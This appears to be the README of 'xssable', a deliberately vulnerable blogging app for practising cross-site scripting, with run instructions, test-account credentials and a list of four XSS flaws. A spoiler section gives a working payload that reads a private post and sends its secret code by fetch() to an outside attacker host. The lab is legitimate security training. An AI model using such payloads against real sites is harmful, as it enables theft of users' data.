xssable
A vulnerable blogging platform used to demonstrate XSS vulnerabilities.
Table of Contents
Loading contents...
README.md
xssable
xssable is a vulnerable blogging platform used to demonstrate XSS vulnerabilities.
Usage
To run it locally:
docker build . -t xssable:latest
docker run -p 5000:5000 xssable:latest
or
pip install -r requirements.txt
python app.py
Then access the application on http://127.0.0.1:5000.
Spoiler!
Credentials for the built-in user accounts are `John:12345` and `Connie:iloveyou1`.Currently there are 4 different XSS vulnerabilities:
- a reflected XSS (with the possibility to bypass Chrome’s XSS Auditor),
- a stored XSS with limited exploitation,
- a stored XSS without limitations, and
- a
location.hashto.innerHTMLbased DOM XSS.
Exploitation (beyond alert() pop-ups) can be practiced by getting access to Connie’s private blog post and stealing the secret code.
Spoiler!
fetch('/blogs').then(r => r.text()).then(t => fetch('https://attacker.kiwi.com/?s='%2bt.split('%F0%9F%94%92')[1].split('<strong>')[1].split('<')[0]))</script>
The application highlights that:
- blacklists are bypass-able,
- browser protections are unreliable,
- not every “XSS” has the same impact,
- frameworks do unexpected stuff, and
- server-side validation is important.
What’s next?
- https://xss-game.appspot.com/ - good for basics, created by Google.
- https://knock.xss.moe - focused on exploitation and filter evasion.
- https://polyglot.innerht.ml/ - an awesome polyglot challenge (it’s over by now and the results are public).
Tool Information
Related Tools
llm-sec
A hands-on learning platform for understanding and testing LLM security vulnerabilities
Stable
owasp-masvs
The OWASP MASVS (Mobile Application Security Verification Standard) is the industry standard for mobile app security.
Stable
IWA-Java
Insecure Web + API application with example Fortify integrations into many DevSecOps and CICD platforms
Stable